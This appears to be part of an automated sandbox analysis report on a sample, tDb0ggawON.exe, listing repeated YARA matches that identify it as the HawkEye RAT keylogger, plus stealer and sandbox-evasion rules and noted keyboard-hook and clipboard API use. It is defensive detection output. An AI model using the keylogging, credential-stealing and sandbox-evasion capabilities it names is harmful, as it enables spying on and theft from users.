Source: Yara match; File source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.45fa72.19.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.45fa72.9.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.tDb0ggawON.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.45fa72.23.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.tDb0ggawON.exe.302b2a8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: tDb0ggawON.exe PID: 5752, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: tDb0ggawON.exe PID: 3536, type: MEMORYSTR
Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.cs; .Net Code: HookKeyboard
Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.cs; .Net Code: HookKeyboard
Source: 11.0.tDb0ggawON.exe.400000.4.unpack, Form1.cs; .Net Code: HookKeyboard
Source: 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.cs; .Net Code: HookKeyboard
Source: 11.0.tDb0ggawON.exe.400000.16.unpack, Form1.cs; .Net Code: HookKeyboard
Source: 11.0.tDb0ggawON.exe.400000.6.unpack, Form1.cs; .Net Code: HookKeyboard
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 14_2_0040D674 OpenClipboard, GetLastError, DeleteFileW

System Summary

Source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
Source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
Source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
Source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
Source: 11.0.tDb0ggawON.exe.45fa72.19.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.0.tDb0ggawON.exe.45fa72.19.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
Source: 11.0.tDb0ggawON.exe.45fa72.9.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.0.tDb0ggawON.exe.45fa72.9.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
Source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
Source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
Source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
Source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
Source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
Source: 11.2.tDb0ggawON.exe.45fa72.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
Source: 11.2.tDb0ggawON.exe.45fa72.1.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                  Source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.45fa72.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.45fa72.23.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.tDb0ggawON.exe.35439a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
                  Source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.2.tDb0ggawON.exe.302b2a8.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: tDb0ggawON.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: 11.2.tDb0ggawON.exe.81e0000.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.2.tDb0ggawON.exe.8080000.9.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.45fa72.19.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.45fa72.19.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.45fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.45fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.2.tDb0ggawON.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.2.tDb0ggawON.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.45fa72.23.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.45fa72.23.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
